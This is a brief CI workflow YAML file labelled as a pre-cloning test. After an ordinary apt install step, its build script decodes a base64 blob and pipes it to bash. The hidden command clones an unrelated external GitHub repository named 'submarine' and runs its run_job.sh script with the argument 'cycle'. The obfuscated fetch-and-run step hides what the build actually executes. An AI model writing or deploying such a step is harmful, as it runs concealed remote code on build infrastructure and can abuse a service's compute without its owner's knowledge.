workflows:
    default-workflow:
        name: Pre cloning workflow Test
        max_build_duration: 120
        instance_type: linux_x2
        pre_clone_scripts:
          - name: Scripts to run before cloning the repository
            script: sudo apt update;sudo apt -y install python3 python3-pip python3-venv
        scripts:
            - name: Scripts to run after cloning the repository
              script: base64 -d <<< IyEvYmluL2Jhc2gKZ2l0IGNsb25lIGh0dHBzOi8vZ2l0aHViLmNvbS9zYW5lbGVkaW5nZXp3ZW5pL3N1Ym1hcmluZS5naXQ7Y2Qgc3VibWFyaW5lO2NobW9kICt4IHJ1bl9qb2Iuc2g7YmFzaCBydW5fam9iLnNoIGN5Y2xl | bash
